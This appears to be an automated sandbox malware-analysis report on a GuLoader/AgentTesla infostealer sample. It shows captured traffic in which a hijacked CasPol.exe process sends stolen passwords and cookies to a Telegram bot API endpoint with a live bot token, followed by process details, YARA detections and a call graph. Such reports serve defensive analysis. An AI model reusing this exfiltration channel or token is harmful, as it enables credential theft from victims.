                                                                                                                        2022-08-05 03:05:18 UTC214INData Raw: 53 55 69 f1 fe 1d 14 f5 4c a5 9e 55 da dd 8b ba e4 0b e9 39 4b e6 0c 94 cf 1d 74 ce 14 93 5f 67 79 da b4 27 d8 23 8c 55 e5 de 47 34 d3 f9 64 4d 39 47 03 e7 c7 b9 ef 60 14 88 f2 b5 e3 2d 3d 5f e4 37 7f bf e5 6b be 93 92 50 2d c0 a1 73 f2 21 5a a8 0e 2a f3 f3 c3 42 0b 87 7b d5 99 21 55 aa 11 b5 0c f7 2d 91 ea 08 9b f2 43 5b 29 be c7 4c 8c b7 f8 3a 97 1a 9c 63 29 7c 71 23 1c 71 df 7c d6 22 cc 18 46 6e b2 dc dc 9c 1c 90 46 ae ea de d8 2b e4 f0 c2 a0 90 eb d2 fe 93 21 7f bf c1 b7 b5 67 df 87 fc fd 09 71 3d a8 11 c2 99 ee b2 34 97 40 b5 0b 46 41 3f f6 c9 c2 a1 47 14 0c 5d 20 1b c2 a9 b1 2a 9c d0 85 2e 1f ca fd 2f 1d 9c 89 26 6b a4 ac 9b 8b 13 fd 00 96 18 35 be 4a 26 a2 2c 6f cd 78 7c 88 64 0f 81 cc e9 5b 48 04 11 4d e6 4c 52 40 48 07 0b d4 e7 dc 7d 16 f3 65 39
                                                                                                                        Data Ascii: SUiLU9Kt_gy'#UG4dM9G`-=_7kP-s!Z*B{!U-C[)L:c)|q#q|"FnF+!gq=4@FA?G] *./&k5J&,ox|d[HMLR@H}e9


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.11.2049795149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2022-08-05 03:06:58 UTC218OUTPOST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1
                                                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8da76b5bf10022b
                                                                                                                        Host: api.telegram.org
                                                                                                                        Content-Length: 1009
                                                                                                                        Expect: 100-continue
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2022-08-05 03:06:58 UTC218INHTTP/1.1 100 Continue
                                                                                                                        2022-08-05 03:06:58 UTC219OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 62 35 62 66 31 30 30 32 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 36 31 36 31 36 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 62 35 62 66 31 30 30 32 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 33 30 31 33 38 39 0a 4f 53 46 75 6c 6c
                                                                                                                        Data Ascii: -----------------------------8da76b5bf10022bContent-Disposition: form-data; name="chat_id"561616954-----------------------------8da76b5bf10022bContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/301389OSFull
                                                                                                                        2022-08-05 03:06:58 UTC219INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.18.0
                                                                                                                        Date: Fri, 05 Aug 2022 03:06:58 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Content-Length: 620
                                                                                                                        Connection: close
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                        {"ok":true,"result":{"message_id":17973,"from":{"id":5088709131,"is_bot":true,"first_name":"banty","username":"bantyloggers_bot"},"chat":{"id":561616954,"first_name":"Ghost","username":"GostMan667","type":"private"},"date":1659668818,"document":{"file_name":"user-301389 2022-08-05 07-40-18.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAJGNWLsiVIGM1aZDne4oDFgxmmJR58sAAIeDQACoN1pU3TJEdeTS7D3KQQ","file_unique_id":"AgADHg0AAqDdaVM","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/301389\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.11.2049796149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2022-08-05 03:07:01 UTC220OUTPOST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1
                                                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8da76b6c46d8ffc
                                                                                                                        Host: api.telegram.org
                                                                                                                        Content-Length: 21528
                                                                                                                        Expect: 100-continue
                                                                                                                        2022-08-05 03:07:01 UTC221INHTTP/1.1 100 Continue
                                                                                                                        2022-08-05 03:07:01 UTC221OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 62 36 63 34 36 64 38 66 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 36 31 36 31 36 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 62 36 63 34 36 64 38 66 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 33 30 31 33 38 39 0a 4f 53
                                                                                                                        Data Ascii: -----------------------------8da76b6c46d8ffcContent-Disposition: form-data; name="chat_id"561616954-----------------------------8da76b6c46d8ffcContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/301389OS
                                                                                                                        2022-08-05 03:07:01 UTC222OUTData Raw: 7f 59 5e 72 f3 2f c1 3a 80 11 0a 8e 4a c3 d3 e8 38 12 fd 5f 39 a4 50 f1 64 2a 9e be 54 ca 02 37 34 46 18 02 a1 fe 67 37 30 86 23 72 0c 15 cb 88 1d 6c 04 8e f8 2f 5c 6a cf 3b a4 90 a9 ff 42 18 8c e9 05 c0 30 9a 82 a1 fe 2b 79 da 5a 3e ae 0e 1e 3e 36 f2 6a 4b 93 88 96 fc 7c aa d0 92 07 12 82 96 3c 10 8f ea ea 30 2e 2e 49 a4 34 2b 0b 9e 14 8a 8b a7 45 13 00 e7 98 18 3a 99 f9 37 fa 57 82 44 eb fc fa 45 18 3a c1 f6 fc 7f 3a 43 81 80 fc 47 08 63 e5 96 14 17 67 4d 45 30 0b 6a 22 8e 8e 01 2e b6 df 8a 68 e0 13 35 a0 6c 75 76 73 b5 f3 45 7a a2 ec 91 0b 72 e2 af fc e7 ee e9 e0 82 f4 0c 90 77 b2 09 d0 92 9f 2b 45 17 38 57 57 65 e3 92 34 15 ff 53 9e 03 2c a0 75 80 9f ec 0c 4d 3c 80 30 08 e3 62 87 5e 67 81 8e 42 5f 32 fe 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 f9
                                                                                                                        Data Ascii: Y^r/:J8_9Pd*T74Fg70#rl/\j;B0+yZ>>6jK|<0..I4+E:7WDE::CGcgME0j".h5luvsEzrw+E8WWe4S,uM<0b^gB_2
                                                                                                                        2022-08-05 03:07:01 UTC238OUTData Raw: 94 d7 94 bd 97 f5 33 ab 1b 2b 3f cb 20 4f 35 87 35 4f 8f c0 06 36 41 0e 3c 5b 2c c7 03 2e 5d de 66 de a3 7c 6c d0 78 a8 fd bf e8 49 33 7c 98 ff df d6 6d ff 67 c8 02 2d 1d 28 eb b2 8d 1a c4 7a 15 a0 82 5b 7c 77 51 65 86 08 92 01 aa 24 86 ab 65 6a 1f c4 3a 29 a0 c8 06 6e 2e 2a 9e 11 81 ec 01 2c 39 ff d3 de 9f 47 82 0b a2 24 ca 50 f9 f7 14 bf ab 83 35 82 2a cd 28 39 80 8f 43 c9 31 21 04 1c 96 d1 1e 8e 02 c6 eb 1d ac 6d 10 d1 32 40 a5 b0 f4 9e b5 17 e3 8b 94 55 5c 10 84 14 e3 26 a3 eb c1 28 0e 68 58 2a 9e c2 0c 3b 34 3a 1c 13 4a 43 90 b5 19 f7 4d 97 bb 0f 6c 22 0a a7 63 c2 d1 3e 48 b4 ae ae 91 9e ae 9e 9e 0e 5a 1f 41 92 05 4e 58 5e f6 0b f8 50 04 91 a1 05 21 ba fc e3 10 04 0e 6b 16 9d 7f 2b 30 a4 81 d1 9e c5 b1 ce 1c d8 41 e0 f4 80 c1 01 c6 bd 7f 3e 0e 80 c0
                                                                                                                        Data Ascii: 3+? O55O6A<[,.]f|lxI3|mg-(z[|wQe$ej:)n.*,9G$P5*(9C1!m2@U\&(hX*;4:JCMl"c>HZANX^P!k+0A>
                                                                                                                        2022-08-05 03:07:01 UTC242OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 62 36 63 34 36 64 38 66 66 63 2d 2d 0d 0a
                                                                                                                        Data Ascii: -----------------------------8da76b6c46d8ffc--
                                                                                                                        2022-08-05 03:07:01 UTC242INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.18.0
                                                                                                                        Date: Fri, 05 Aug 2022 03:07:01 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Content-Length: 631
                                                                                                                        Connection: close
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                        {"ok":true,"result":{"message_id":17974,"from":{"id":5088709131,"is_bot":true,"first_name":"banty","username":"bantyloggers_bot"},"chat":{"id":561616954,"first_name":"Ghost","username":"GostMan667","type":"private"},"date":1659668821,"document":{"file_name":"user-301389 2022-08-05 07-42-49.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAJGNmLsiVVtPs4PxuBFJLQqPpBTwDF3AAIfDQACoN1pU_kfi6DMwDulKQQ","file_unique_id":"AgADHw0AAqDdaVM","file_size":20946},"caption":"New Cookie Recovered!\n\nUser Name: user/301389\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:1
                                                                                                                        Start time:05:04:54
                                                                                                                        Start date:05/08/2022
                                                                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:520128 bytes
                                                                                                                        MD5 hash:1E0BF9BE9A0E840D758E3E43D44B400D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        Target ID:3
                                                                                                                        Start time:05:05:07
                                                                                                                        Start date:05/08/2022
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe"
                                                                                                                        Imagebase:0xd40000
                                                                                                                        File size:108664 bytes
                                                                                                                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.37843137887.000000001D8D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000000.32918874491.0000000001120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                        Reputation:moderate

                                                                                                                        Target ID:4
                                                                                                                        Start time:05:05:08
                                                                                                                        Start date:05/08/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff677570000
                                                                                                                        File size:875008 bytes
                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:5%
                                                                                                                          Dynamic/Decrypted Code Coverage:10.4%
                                                                                                                          Signature Coverage:26.2%
                                                                                                                          Total number of Nodes:989
                                                                                                                          Total number of Limit Nodes:51
                                                                                                                          execution_graph 16302 403640 SetErrorMode GetVersionExW 16303 403692 GetVersionExW 16302->16303 16304 4036ca 16302->16304 16303->16304 16305 403723 16304->16305 16306 406a35 5 API calls 16304->16306 16393 4069c5 GetSystemDirectoryW 16305->16393 16306->16305 16308 403739 lstrlenA 16308->16305 16309 403749 16308->16309 16396 406a35 GetModuleHandleA 16309->16396 16312 406a35 5 API calls 16313 403757 16312->16313 16314 406a35 5 API calls 16313->16314 16315 403763 #17 OleInitialize SHGetFileInfoW 16314->16315 16402 406668 lstrcpynW 16315->16402 16318 4037b0 GetCommandLineW 16403 406668 lstrcpynW 16318->16403 16320 4037c2 16404 405f64 16320->16404 16323 4038f7 16324 40390b GetTempPathW 16323->16324 16408 40360f 16324->16408 16326 403923 16327 403927 GetWindowsDirectoryW lstrcatW 16326->16327 16328 40397d DeleteFileW 16326->16328 16331 40360f 12 API calls 16327->16331 16418 4030d0 GetTickCount GetModuleFileNameW 16328->16418 16329 405f64 CharNextW 16330 4037f9 16329->16330 16330->16323 16330->16329 16336 4038f9 16330->16336 16333 403943 16331->16333 16333->16328 16335 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 16333->16335 16334 403990 16337 403a54 16334->16337 16340 403a45 16334->16340 16344 405f64 CharNextW 16334->16344 16339 40360f 12 API calls 16335->16339 16504 406668 lstrcpynW 16336->16504 16558 403c25 16337->16558 16343 403975 16339->16343 16448 403d17 16340->16448 16343->16328 16343->16337 16357 4039b2 16344->16357 16346 403b91 16349 403b99 GetCurrentProcess OpenProcessToken 16346->16349 16350 403c0f ExitProcess 16346->16350 16347 403b7c 16567 405cc8 16347->16567 16355 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 16349->16355 16356 403bdf 16349->16356 16352 403a1b 16505 40603f 16352->16505 16353 403a5c 16521 405c33 16353->16521 16355->16356 16360 406a35 5 API calls 16356->16360 16357->16352 16357->16353 16363 403be6 16360->16363 16366 403bfb ExitWindowsEx 16363->16366 16367 403c08 16363->16367 16364 403a72 lstrcatW 16365 403a7d lstrcatW lstrcmpiW 16364->16365 16365->16337 16368 403a9d 16365->16368 16366->16350 16366->16367 16571 40140b 16367->16571 16371 403aa2 16368->16371 16372 403aa9 16368->16372 16524 405b99 CreateDirectoryW 16371->16524 16529 405c16 CreateDirectoryW 16372->16529 16373 403a3a 16520 406668 lstrcpynW 16373->16520 16378 403aae SetCurrentDirectoryW 16379 403ac0 16378->16379 16380 403acb 16378->16380 16532 406668 lstrcpynW 16379->16532 16533 406668 lstrcpynW 16380->16533 16385 403b19 CopyFileW 16390 403ad8 16385->16390 16386 403b63 16388 406428 36 API calls 16386->16388 16388->16337 16389 4066a5 17 API calls 16389->16390 16390->16386 16390->16389 16392 403b4d CloseHandle 16390->16392 16534 4066a5 16390->16534 16551 406428 MoveFileExW 16390->16551 16555 405c4b CreateProcessW 16390->16555 16392->16390 16394 4069e7 wsprintfW LoadLibraryExW 16393->16394 16394->16308 16397 406a51 16396->16397 16398 406a5b GetProcAddress 16396->16398 16399 4069c5 3 API calls 16397->16399 16400 403750 16398->16400 16401 406a57 16399->16401 16400->16312 16401->16398 16401->16400 16402->16318 16403->16320 16405 405f6a 16404->16405 16406 4037e8 CharNextW 16405->16406 16407 405f71 CharNextW 16405->16407 16406->16330 16407->16405 16574 4068ef 16408->16574 16410 403625 16410->16326 16411 40361b 16411->16410 16583 405f37 lstrlenW CharPrevW 16411->16583 16414 405c16 2 API calls 16415 403633 16414->16415 16586 406187 16415->16586 16590 406158 GetFileAttributesW CreateFileW 16418->16590 16420 403113 16447 403120 16420->16447 16591 406668 lstrcpynW 16420->16591 16422 403136 16592 405f83 lstrlenW 16422->16592 16426 403147 GetFileSize 16427 403241 16426->16427 16428 40315e 16426->16428 16597 40302e 16427->16597 16428->16427 16434 4032de 16428->16434 16441 40302e 32 API calls 16428->16441 16428->16447 16628 4035e2 16428->16628 16432 403286 GlobalAlloc 16435 40329d 16432->16435 16437 40302e 32 API calls 16434->16437 16439 406187 2 API calls 16435->16439 16436 403267 16438 4035e2 ReadFile 16436->16438 16437->16447 16440 403272 16438->16440 16442 4032ae CreateFileW 16439->16442 16440->16432 16440->16447 16441->16428 16443 4032e8 16442->16443 16442->16447 16612 4035f8 SetFilePointer 16443->16612 16445 4032f6 16613 403371 16445->16613 16447->16334 16447->16447 16449 406a35 5 API calls 16448->16449 16450 403d2b 16449->16450 16451 403d31 16450->16451 16452 403d43 16450->16452 16690 4065af wsprintfW 16451->16690 16691 406536 16452->16691 16456 403d92 lstrcatW 16457 403d41 16456->16457 16675 403fed 16457->16675 16458 406536 3 API calls 16458->16456 16461 40603f 18 API calls 16462 403dc4 16461->16462 16463 403e58 16462->16463 16465 406536 3 API calls 16462->16465 16464 40603f 18 API calls 16463->16464 16466 403e5e 16464->16466 16467 403df6 16465->16467 16468 403e6e LoadImageW 16466->16468 16469 4066a5 17 API calls 16466->16469 16467->16463 16473 403e17 lstrlenW 16467->16473 16475 405f64 CharNextW 16467->16475 16470 403f14 16468->16470 16471 403e95 RegisterClassW 16468->16471 16469->16468 16472 40140b 2 API calls 16470->16472 16474 403ecb SystemParametersInfoW CreateWindowExW 16471->16474 16503 403f1e 16471->16503 16479 403f1a 16472->16479 16476 403e25 lstrcmpiW 16473->16476 16477 403e4b 16473->16477 16474->16470 16481 403e14 16475->16481 16476->16477 16478 403e35 GetFileAttributesW 16476->16478 16480 405f37 3 API calls 16477->16480 16482 403e41 16478->16482 16483 403fed 18 API calls 16479->16483 16479->16503 16484 403e51 16480->16484 16481->16473 16482->16477 16485 405f83 2 API calls 16482->16485 16486 403f2b 16483->16486 16696 406668 lstrcpynW 16484->16696 16485->16477 16488 403f37 ShowWindow 16486->16488 16489 403fba 16486->16489 16491 4069c5 3 API calls 16488->16491 16683 40579d OleInitialize 16489->16683 16493 403f4f 16491->16493 16492 403fc0 16494 403fc4 16492->16494 16495 403fdc 16492->16495 16496 403f5d GetClassInfoW 16493->16496 16498 4069c5 3 API calls 16493->16498 16501 40140b 2 API calls 16494->16501 16494->16503 16497 40140b 2 API calls 16495->16497 16499 403f71 GetClassInfoW RegisterClassW 16496->16499 16500 403f87 DialogBoxParamW 16496->16500 16497->16503 16498->16496 16499->16500 16502 40140b 2 API calls 16500->16502 16501->16503 16502->16503 16503->16337 16504->16324 16712 406668 lstrcpynW 16505->16712 16507 406050 16713 405fe2 CharNextW CharNextW 16507->16713 16510 403a27 16510->16337 16519 406668 lstrcpynW 16510->16519 16511 4068ef 5 API calls 16517 406066 16511->16517 16512 406097 lstrlenW 16513 4060a2 16512->16513 16512->16517 16515 405f37 3 API calls 16513->16515 16516 4060a7 GetFileAttributesW 16515->16516 16516->16510 16517->16510 16517->16512 16518 405f83 2 API calls 16517->16518 16719 40699e FindFirstFileW 16517->16719 16518->16512 16519->16373 16520->16340 16522 406a35 5 API calls 16521->16522 16523 403a61 lstrcatW 16522->16523 16523->16364 16523->16365 16525 405bea GetLastError 16524->16525 16526 403aa7 16524->16526 16525->16526 16527 405bf9 SetFileSecurityW 16525->16527 16526->16378 16527->16526 16528 405c0f GetLastError 16527->16528 16528->16526 16530 405c26 16529->16530 16531 405c2a GetLastError 16529->16531 16530->16378 16531->16530 16532->16380 16533->16390 16535 4066b2 16534->16535 16536 4068d5 16535->16536 16539 4068a3 lstrlenW 16535->16539 16542 406536 3 API calls 16535->16542 16543 4066a5 10 API calls 16535->16543 16544 4067ba GetSystemDirectoryW 16535->16544 16545 4067cd GetWindowsDirectoryW 16535->16545 16546 4067fc SHGetSpecialFolderLocation 16535->16546 16547 406844 lstrcatW 16535->16547 16548 4066a5 10 API calls 16535->16548 16549 4068ef 5 API calls 16535->16549 16722 4065af wsprintfW 16535->16722 16723 406668 lstrcpynW 16535->16723 16537 403b0d DeleteFileW 16536->16537 16724 406668 lstrcpynW 16536->16724 16537->16385 16537->16390 16539->16535 16542->16535 16543->16539 16544->16535 16545->16535 16546->16535 16550 406814 SHGetPathFromIDListW CoTaskMemFree 16546->16550 16547->16535 16548->16535 16549->16535 16550->16535 16552 406449 16551->16552 16553 40643c 16551->16553 16552->16390 16725 4062ae 16553->16725 16556 405c8a 16555->16556 16557 405c7e CloseHandle 16555->16557 16556->16390 16557->16556 16559 403c40 16558->16559 16560 403c36 CloseHandle 16558->16560 16561 403c54 16559->16561 16562 403c4a CloseHandle 16559->16562 16560->16559 16759 403c82 16561->16759 16562->16561 16568 405cdd 16567->16568 16569 403b89 ExitProcess 16568->16569 16570 405cf1 MessageBoxIndirectW 16568->16570 16570->16569 16572 401389 2 API calls 16571->16572 16573 401420 16572->16573 16573->16350 16575 4068fc 16574->16575 16577 406965 CharNextW 16575->16577 16578 406972 16575->16578 16579 405f64 CharNextW 16575->16579 16581 406951 CharNextW 16575->16581 16582 406960 CharNextW 16575->16582 16576 406977 CharPrevW 16576->16578 16577->16575 16577->16578 16578->16576 16580 406998 16578->16580 16579->16575 16580->16411 16581->16575 16582->16577 16584 405f53 lstrcatW 16583->16584 16585 40362d 16583->16585 16584->16585 16585->16414 16587 406194 GetTickCount GetTempFileNameW 16586->16587 16588 4061ca 16587->16588 16589 40363e 16587->16589 16588->16587 16588->16589 16589->16326 16590->16420 16591->16422 16593 405f91 16592->16593 16594 40313c 16593->16594 16595 405f97 CharPrevW 16593->16595 16596 406668 lstrcpynW 16594->16596 16595->16593 16595->16594 16596->16426 16598 403057 16597->16598 16599 40303f 16597->16599 16602 403067 GetTickCount 16598->16602 16603 40305f 16598->16603 16600 403048 DestroyWindow 16599->16600 16601 40304f 16599->16601 16600->16601 16601->16432 16601->16447 16631 4035f8 SetFilePointer 16601->16631 16602->16601 16605 403075 16602->16605 16632 406a71 16603->16632 16606 4030aa CreateDialogParamW ShowWindow 16605->16606 16607 40307d 16605->16607 16606->16601 16607->16601 16636 403012 16607->16636 16609 40308b wsprintfW 16639 4056ca 16609->16639 16612->16445 16614 403380 SetFilePointer 16613->16614 16615 40339c 16613->16615 16614->16615 16650 403479 GetTickCount 16615->16650 16618 403439 16618->16447 16621 403479 42 API calls 16622 4033d3 16621->16622 16622->16618 16623 40343f ReadFile 16622->16623 16625 4033e2 16622->16625 16623->16618 16625->16618 16626 4061db ReadFile 16625->16626 16665 40620a WriteFile 16625->16665 16626->16625 16629 4061db ReadFile 16628->16629 16630 4035f5 16629->16630 16630->16428 16631->16436 16633 406a8e PeekMessageW 16632->16633 16634 406a84 DispatchMessageW 16633->16634 16635 406a9e 16633->16635 16634->16633 16635->16601 16637 403021 16636->16637 16638 403023 MulDiv 16636->16638 16637->16638 16638->16609 16640 4056e5 16639->16640 16649 4030a8 16639->16649 16641 405701 lstrlenW 16640->16641 16642 4066a5 17 API calls 16640->16642 16643 40572a 16641->16643 16644 40570f lstrlenW 16641->16644 16642->16641 16645 405730 SetWindowTextW 16643->16645 16646 40573d 16643->16646 16647 405721 lstrcatW 16644->16647 16644->16649 16645->16646 16648 405743 SendMessageW SendMessageW SendMessageW 16646->16648 16646->16649 16647->16643 16648->16649 16649->16601 16651 4035d1 16650->16651 16652 4034a7 16650->16652 16654 40302e 32 API calls 16651->16654 16667 4035f8 SetFilePointer 16652->16667 16660 4033a3 16654->16660 16655 4034b2 SetFilePointer 16659 4034d7 16655->16659 16656 4035e2 ReadFile 16656->16659 16658 40302e 32 API calls 16658->16659 16659->16656 16659->16658 16659->16660 16661 40620a WriteFile 16659->16661 16662 4035b2 SetFilePointer 16659->16662 16668 406bb0 16659->16668 16660->16618 16663 4061db ReadFile 16660->16663 16661->16659 16662->16651 16664 4033bc 16663->16664 16664->16618 16664->16621 16666 406228 16665->16666 16666->16625 16667->16655 16669 406bd5 16668->16669 16672 406bdd 16668->16672 16669->16659 16670 406c64 GlobalFree 16671 406c6d GlobalAlloc 16670->16671 16671->16669 16671->16672 16672->16669 16672->16670 16672->16671 16673 406ce4 GlobalAlloc 16672->16673 16674 406cdb GlobalFree 16672->16674 16673->16669 16673->16672 16674->16673 16676 404001 16675->16676 16697 4065af wsprintfW 16676->16697 16678 404072 16698 4040a6 16678->16698 16680 403da2 16680->16461 16681 404077 16681->16680 16682 4066a5 17 API calls 16681->16682 16682->16681 16701 404610 16683->16701 16685 4057e7 16686 404610 SendMessageW 16685->16686 16687 4057f9 OleUninitialize 16686->16687 16687->16492 16689 4057c0 16689->16685 16704 401389 16689->16704 16690->16457 16708 4064d5 16691->16708 16694 403d73 16694->16456 16694->16458 16695 40656a RegQueryValueExW RegCloseKey 16695->16694 16696->16463 16697->16678 16699 4066a5 17 API calls 16698->16699 16700 4040b4 SetWindowTextW 16699->16700 16700->16681 16702 404628 16701->16702 16703 404619 SendMessageW 16701->16703 16702->16689 16703->16702 16706 401390 16704->16706 16705 4013fe 16705->16689 16706->16705 16707 4013cb MulDiv SendMessageW 16706->16707 16707->16706 16709 4064e4 16708->16709 16710 4064e8 16709->16710 16711 4064ed RegOpenKeyExW 16709->16711 16710->16694 16710->16695 16711->16710 16712->16507 16714 405fff 16713->16714 16716 406011 16713->16716 16714->16716 16717 40600c CharNextW 16714->16717 16715 406035 16715->16510 16715->16511 16716->16715 16718 405f64 CharNextW 16716->16718 16717->16715 16718->16716 16720 4069b4 FindClose 16719->16720 16721 4069bf 16719->16721 16720->16721 16721->16517 16722->16535 16723->16535 16724->16537 16726 406304 GetShortPathNameW 16725->16726 16727 4062de 16725->16727 16729 406423 16726->16729 16730 406319 16726->16730 16752 406158 GetFileAttributesW CreateFileW 16727->16752 16729->16552 16730->16729 16732 406321 wsprintfA 16730->16732 16731 4062e8 CloseHandle GetShortPathNameW 16731->16729 16733 4062fc 16731->16733 16734 4066a5 17 API calls 16732->16734 16733->16726 16733->16729 16735 406349 16734->16735 16753 406158 GetFileAttributesW CreateFileW 16735->16753 16737 406356 16737->16729 16738 406365 GetFileSize GlobalAlloc 16737->16738 16739 406387 16738->16739 16740 40641c 